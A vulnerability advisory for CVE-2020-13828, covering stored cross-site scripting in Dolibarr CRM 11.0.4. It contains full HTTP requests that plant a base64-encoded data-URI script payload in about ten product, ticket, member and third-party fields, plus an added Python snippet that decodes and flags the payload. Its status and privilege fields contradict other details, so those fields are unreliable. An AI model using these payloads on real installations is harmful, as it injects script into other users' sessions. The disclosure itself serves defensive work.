Security Research & Advisories

Multiple Stored Cross-Site Scripting Vulnerabilities in Dolibarr CRM

Vendor
Product: Dolibarr
Affected Version(s): 11.0.4 and probably prior
Tested Version(s): 11.0.4
Vendor Notification: May 27, 2020
Advisory Publication: May 27, 2020 [without technical details]
Vendor Fix Version: 11.0.5
Public Disclosure: August 25, 2020
Latest Modification: August 25, 2020
CVE Identifier(s): CVE-2020-13828
Product Description: Dolibarr ERP/CRM is an open source, free software package for small and medium companies, foundations or freelancers. It includes different features for enterprise resource planning (ERP) and customer relationship management (CRM) but also other features for different activities.
Credits: Luis Noriega, Security Researcher & Penetration Tester @wizlynx group

Vulnerability Details

Stored Cross-Site Scripting (XSS) Vulnerability
Severity: Medium
CVSS Score: 6.1
CWE-ID: CWE-79
Status: Not Fixed
Vulnerability Description
The application Dolibarr CRM is affected by multiple stored Cross-Site Scripting (XSS) vulnerabilities affecting version 11.0.4 and probably prior versions. These vulnerabilities could allow remote authenticated attackers to inject arbitrary web script or HTML.
CVSS Base Score
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Changed
Confidentiality Impact: Low
Integrity Impact: Low
Availability Impact: None

Description

Dolibarr has multiple stored Cross-Site Scripting (XSS) vulnerabilities due to the lack of input validation and output encoding.

PoC

Example #1

The following payload was successfully submitted to the server in the label parameter:

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg=='></object>

This input was echoed unmodified in the application's response, resulting in Cross-Site Scripting (see the request below).

POST /dolibarr/product/card.php?id=2 HTTP/1.1

token=%242y%2410%24A.bF3SJr4WvTRsxUfLwnEemzTF68V3mEfgYBJeYSs2%2FRQBB3JvWFy&action=update&id=2&canvas=&ref=123455667&label=%3Cobject+data%3D%27data%3Atext%2Fhtml%3B%3B%3B%3B%3Bbase64%2CPHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg%3D%3D%27%3E%3C%2Fobject%3E&statut=1&statut_buy=1&barcode=&desc=%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%26nbsp%3B&url=&finished=-1&weight=&weight_units=0&size=&sizewidth=&sizeheight=&size_units=0&surface=&surface_units=0&volume=&volume_units=0&customcode=&country_id=&accountancy_code_sell=&accountancy_code_sell_export=&accountancy_code_buy=

Payload:

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg=='></object>

Where:
“PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg==” = <script>alert("@nogagmx")</script>

The following screenshot shows both the request and response:

The following screenshot shows the JavaScript being executed on the client side:
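The two sides of this finding, the missing input validation named in the Description and the unencoded echo shown in Example #1, can be checked over the captured request. The following script is an added example, not part of the advisory or of Dolibarr: it URL-decodes a constructed copy of the PoC body, flags form fields whose value carries markup or an HTML data: URI (decoding the embedded base64 so an analyst sees the script), and shows the output encoding that would have rendered the stored label inert (the PHP equivalent in Dolibarr's code base is htmlspecialchars with ENT_QUOTES).

```python
import base64
import html
import re
from urllib.parse import parse_qs

# Constructed sample: an abridged copy of the form-encoded body from the
# Example #1 request (label carries the payload, other fields are benign).
SAMPLE_BODY = (
    "action=update&id=2&ref=123455667"
    "&label=%3Cobject+data%3D%27data%3Atext%2Fhtml%3B%3B%3B%3B%3Bbase64%2C"
    "PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg%3D%3D%27%3E%3C%2Fobject%3E"
    "&statut=1&customcode=&country_id="
)

# HTML data: URI with a base64 body; ';*' tolerates the padding of stray
# semicolons seen in the advisory's payload.
DATA_HTML_RE = re.compile(r"data:text/html;*base64,([A-Za-z0-9+/=]+)", re.I)
# Any HTML-looking opening or closing tag.
TAG_RE = re.compile(r"<\s*/?\s*[a-z][^>]*>", re.I)


def suspicious_fields(body: str) -> dict:
    """Map each form field whose decoded value carries markup to the
    script hidden in its data: URI (or to the raw tag if there is none)."""
    found = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:  # parse_qs already URL-decodes ('+' -> space)
            match = DATA_HTML_RE.search(value)
            if match:
                try:
                    found[name] = base64.b64decode(match.group(1)).decode("utf-8", "replace")
                except ValueError:  # binascii.Error is a ValueError
                    found[name] = "<undecodable base64>"
            elif TAG_RE.search(value):
                found[name] = value
    return found


def encode_for_html(value: str) -> str:
    """Output encoding that makes a stored value inert when echoed into an
    HTML text node or a quoted attribute: '<', '>', '&', '"' and "'" are
    all turned into entities, so no tag or attribute boundary survives."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for field, payload in suspicious_fields(SAMPLE_BODY).items():
        print(f"{field}: {payload}")
        print("encoded:", encode_for_html(payload))
```

Running the block prints the label field with its decoded script, followed by the entity-encoded form that a browser would display as literal text instead of executing.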


Example #2

Additionally, it was possible to inject our malicious payload in the name_alias parameter (Third-party Section) as shown in the following request:

POST /dolibarr/societe/card.php?socid=4 HTTP/1.1


-----------------------------5276315661579106896916459915
Content-Disposition: form-data; name="name"

test xss
-----------------------------5276315661579106896916459915
Content-Disposition: form-data; name="name_alias"

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg=='></object>

The following screenshot shows both the request and response:

After following the redirection, the payload is shown in the application response without any encoding.

The following screenshot shows the JavaScript being executed on the client side:


Other affected pages & parameters:

customcode parameter – Product Section

POST /dolibarr/product/card.php?id=2 HTTP/1.1

token=%242y%2410%24A.bF3SJr4WvTRsxUfLwnEemzTF68V3mEfgYBJeYSs2%2FRQBB3JvWFy&action=update&id=2&canvas=&ref=123455667&label=test&statut=1&statut_buy=1&barcode=&desc=%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%26nbsp%3B&url=&finished=-1&weight=&weight_units=0&size=&sizewidth=&sizeheight=&size_units=0&surface=&surface_units=0&volume=&volume_units=0&customcode=%3Cobject+data%3D%27data%3Atext%2Fhtml%3B%3B%3B%3B%3Bbase64%2CPHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg%3D%3D%27%3E%3C%2Fobject%3E&country_id=&accountancy_code_sell=&accountancy_code_sell_export=&accountancy_code_buy=

subject parameter – Ticket Section

POST /dolibarr/ticket/card.php?action=create&idmenu=21&mainmenu=ticket&leftmenu= HTTP/1.1

-----------------------------1968352102747999012167307275
Content-Disposition: form-data; name="category_code"

OTHER
-----------------------------1968352102747999012167307275
Content-Disposition: form-data; name="subject"

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg=='></object>
-----------------------------1968352102747999012167307275
Content-Disposition: form-data; name="message"

societe parameter – Member Section

POST /dolibarr/adherents/card.php HTTP/1.1

Content-Disposition: form-data; name="morphy"

phy
-----------------------------20235881561969443630462327924
Content-Disposition: form-data; name="typeid"

1
-----------------------------20235881561969443630462327924
Content-Disposition: form-data; name="societe"
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg=='></object>

address parameter – Member Section

POST /dolibarr/adherents/card.php HTTP/1.1

Content-Disposition: form-data; name="member_email"

-----------------------------1029758512301943784456065998
Content-Disposition: form-data; name="address"

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg=='></object>

message parameter – Ticket Section

POST /dolibarr/ticket/card.php?action=create&idmenu=21&mainmenu=ticket&leftmenu= HTTP/1.1

-----------------------------1366952982792511851202536362
Content-Disposition: form-data; name="subject"

dfdfdfdfdfdfd
-----------------------------1366952982792511851202536362
Content-Disposition: form-data; name="message"

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg=='></object>

barcode parameter – Third-party Section

POST /dolibarr/societe/card.php?socid=5 HTTP/1.1

Content-Disposition: form-data; name="barcode"

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg=='></object>
-----------------------------1613565241541576224808100738
Content-Disposition: form-data; name="status"

open

address parameter – Third-party Section

POST /dolibarr/societe/card.php?socid=5 HTTP/1.1

Content-Disposition: form-data; name="address"

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgiQG5vZ2FnbXgiKTwvc2NyaXB0Pg=='></object>
-----------------------------1613565241541576224808100738
Content-Disposition: form-data; name="zipcode"

-----------------------------1613565241541576224808100738
